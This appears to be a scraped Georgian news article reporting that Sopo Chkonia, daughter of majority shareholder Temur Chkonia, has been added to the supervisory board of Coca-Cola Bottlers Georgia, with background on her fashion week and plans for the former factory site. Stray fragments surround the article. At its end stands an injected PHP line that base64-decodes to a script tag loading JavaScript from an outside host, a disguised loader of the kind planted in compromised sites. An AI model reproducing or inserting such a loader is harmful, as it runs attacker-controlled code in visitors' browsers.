celsiusi
ავერსი შნაიდერი
სოფო ჭყონია „კოკა კოლა ბოთლერს ჯორჯიას“ სამეთვალყურეო საბჭოს წევრი გახდა. შესაბამისი ჩანაწერი უკვე გაჩნდა მეწარმეთა და არასამეწარმეო (არაკომერციული) იურიდიული პირების რეესტრიდან კომპანიის ამონაწერში.
 
„სს კოკა-კოლა ბოთლერს ჯორჯიას 87.47%-იანი აქციების მფლობელი თემურ ჭყონია ვმოქმედებ რა საზოგადოების წესდების 7.1.2 მუხლის და „მეწარმეთა შესახებ“ კანონის 54.1.1 პუნქტით, მივიღე შემდეგი გადაწყვეტილება: ფირმის ინტერესებიდან გამომდინარე მიზანშეწონილად მიმაჩნია სამეთვალყურეო საბჭოს შემადგენლობა გაიზარდოს ოთხ წევრამდე. საზოგადოების სამეთვალყურეო საბჭოს მეოთხე წევრად არჩეული იქნეს სოფიკო ჭყონია“, - აღნიშნულია თემურ ჭყონიას გადაწყვეტილებაში, რომელიც 10 მარტით თარიღდება.
 
თემურ ჭყონიას ქალიშვილის სოფო ჭყონიას გარდა „კოკა კოლა ბოთლერს ჯორჯიას“ სამეთვალყურეო საბჭოს წევრები არიან თავად თემურ ჭყონია, რომელიც თავმჯდომარეა, თავმჯდომარის მოადგილეა გიორგი ახალაძე და ასევე სამეთვალყურეო საბჭოს წევრია შალვა გიგაია.
 
ცნობისთვის, სოფო ჭყონია Mercedes-Benz Fashion Week Tbilisi-ს დამფუძნებელი და ორგანიზატორია. გასული წლის სექტემბერში თემურ ჭყონიამ განაცხადა, რომ მისი ქალიშვილი „კოკა-კოლას“ ძველი ქარხნის ტერიტორიასთან დაკავშირებით გრანდიოზულ, საინტერესო პროექტზე მუშაობდა.
 
მაშინ გამოცემა WWD-თან საუბრისას თავად სოფო ჭყონიამ თქვა, რომ თავისი მიზნების განხორციელებას, პირველ რიგში, ახალი კულტურული სივრცის გახსნით იწყებდა. აღნიშნული სივრცე სწორედ თბილისის ცენტრში მდებარე, „კოკა-კოლას“ ყოფილი ქარხანაა, სადაც დაგეგმილი იყო სამკერვალოების, გალერეების, კაფეების, ბიბლიოთეკების და პოპ-აპ მაღაზიების მოწყობა.
1573
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");